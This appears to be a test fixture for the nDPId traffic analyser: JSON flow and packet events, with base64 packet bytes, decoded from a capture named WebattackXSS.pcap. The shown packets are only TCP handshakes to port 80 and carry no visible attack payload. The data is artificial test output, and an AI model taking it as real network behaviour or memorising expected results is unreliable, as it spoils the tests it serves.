-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3938,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":2,"flow_last_seen":1499347440120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347440120,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ33qAsDTj23aP2KAScSAeDwAAAgQFtAQCCAoD5Ia\/ATq1SQEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3939,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":3,"flow_last_seen":1499347440120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347440120,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Op9AAD4GizmsEAABwKgKMt96AFDbdo\/YgLA05IAQAOW9FQAAAQEICgE6tUoD5Ia\/"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347441364,"flow_last_seen":1499347441364,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347441364,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1499347441364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347441364,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87qpAAD4G1yWsEAABwKgKMt+IAFCFjlgqAAAAAKACchDptwAAAgQFtAQCCAoBOraAAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":2,"flow_last_seen":1499347441364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347441364,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ34gRswTRhY5YK6AScSBIOAAAAgQFtAQCCAoD5If2ATq2gAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3948,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":3,"flow_last_seen":1499347441365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347441365,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07qtAAD4G1yysEAABwKgKMt+IAFCFjlgrEbME0oAQAOXnPgAAAQEICgE6toED5If2"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3959,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347442626,"flow_last_seen":1499347442626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347442626,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3959,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1499347442626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347442626,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WP9AAD4GbNGsEAABwKgKMt+WAFAR1u9DAAAAAKACchDFDAAAAgQFtAQCCAoBOre8AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3960,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":2,"flow_last_seen":1499347442626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347442626,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ35b747kmEdbvRKAScSCDygAAAgQFtAQCCAoD5IkyATq3vAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":3,"flow_last_seen":1499347442627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347442627,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WQBAAD4GbNisEAABwKgKMt+WAFAR1u9E++O5J4AQAOUi0gAAAQEICgE6t7wD5Iky"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3977,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347445158,"flow_last_seen":1499347445158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445158,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57264,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3977,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1499347445158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347445158,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/otAAD4Gx0SsEAABwKgKMt+wAFCaOES+AAAAAKACchDknAAAAgQFtAQCCAoBOro1AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3978,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":2,"flow_last_seen":1499347445158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347445158,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ37CiJaNtmjhEv6AScSAQWQAAAgQFtAQCCAoD5IurATq6NQEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3979,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":3,"flow_last_seen":1499347445159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347445159,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/oxAAD4Gx0usEAABwKgKMt+wAFCaOES\/oiWjboAQAOWvYAAAAQEICgE6ujUD5Iur"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347315631,"flow_last_seen":1499347320705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55888,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347315631,"flow_last_seen":1499347320705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55888,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347318180,"flow_last_seen":1499347323705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55914,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347318180,"flow_last_seen":1499347323705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347319466,"flow_last_seen":1499347324705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55928,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347319466,"flow_last_seen":1499347324705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55928,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347320712,"flow_last_seen":1499347326706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55942,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347320712,"flow_last_seen":1499347326706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55942,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347323234,"flow_last_seen":1499347328706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55968,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347323234,"flow_last_seen":1499347328706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55968,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347324538,"flow_last_seen":1499347329706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55982,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347324538,"flow_last_seen":1499347329706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55982,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347446419,"flow_last_seen":1499347446419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347446419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1499347446419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347446419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oGtAAD4GJWWsEAABwKgKMt++AFBFYxsbAAAAAKACchBhzAAAAgQFtAQCCAoBOrtwAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":2,"flow_last_seen":1499347446420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347446420,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ376sLltvRWMbHKAScSDKQgAAAgQFtAQCCAoD5IzmATq7cAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3991,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":3,"flow_last_seen":1499347446420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347446420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oGxAAD4GJWysEAABwKgKMt++AFBFYxscrC5bcIAQAOVpSQAAAQEICgE6u3ED5Izm"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4001,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347447671,"flow_last_seen":1499347447671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347447671,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4001,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1499347447671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347447671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XZhAAD4GaDisEAABwKgKMt\/MAFDFCOExAAAAAKACchAayQAAAgQFtAQCCAoBOrypAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":2,"flow_last_seen":1499347447671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347447671,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ38yhpTp2xQjhMqAScSCtiAAAAgQFtAQCCAoD5I4fATq8qQEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4003,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":3,"flow_last_seen":1499347447671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347447671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XZlAAD4GaD+sEAABwKgKMt\/MAFDFCOEyoaU6d4AQAOVMkAAAAQEICgE6vKkD5I4f"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4019,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347450180,"flow_last_seen":1499347450180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347450180,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4019,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1499347450180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347450180,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82VFAAD4G7H6sEAABwKgKMt\/mAFCGVWZMAAAAAKACchDR0wAAAgQFtAQCCAoBOr8dAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4020,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":2,"flow_last_seen":1499347450180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347450180,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3+bg3FPQhlVmTaAScSAJjwAAAgQFtAQCCAoD5JCSATq\/HQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4021,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":3,"flow_last_seen":1499347450181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347450181,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02VJAAD4G7IWsEAABwKgKMt\/mAFCGVWZN4NxT0YAQAOWolgAAAQEICgE6vx0D5JCS"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347451427,"flow_last_seen":1499347451427,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347451427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1499347451427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347451427,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gftAAD4GQ9WsEAABwKgKMt\/0AFCzvkGvAAAAAKACchDHwgAAAgQFtAQCCAoBOsBUAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":2,"flow_last_seen":1499347451427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347451427,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3\/Qj19JNs75BsKAScSA8zgAAAgQFtAQCCAoD5JHKATrAVAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":3,"flow_last_seen":1499347451428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347451428,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gfxAAD4GQ9ysEAABwKgKMt\/0AFCzvkGwI9fSToAQAOXb1QAAAQEICgE6wFQD5JHK"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347452731,"flow_last_seen":1499347452731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347452731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1499347452731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347452731,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OxxAAD4GirSsEAABwKgKMuACAFCP5\/qGAAAAAKACchAxbgAAAgQFtAQCCAoBOsGaAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":2,"flow_last_seen":1499347452731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347452731,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4AJ1f\/zHj+f6h6AScSApEQAAAgQFtAQCCAoD5JMQATrBmgEDAwc="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":3,"flow_last_seen":1499347452732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347452732,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ox1AAD4GirusEAABwKgKMuACAFCP5\/qHdX\/8yIAQAOXIGAAAAQEICgE6wZoD5JMQ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347455224,"flow_last_seen":1499347455224,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455224,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 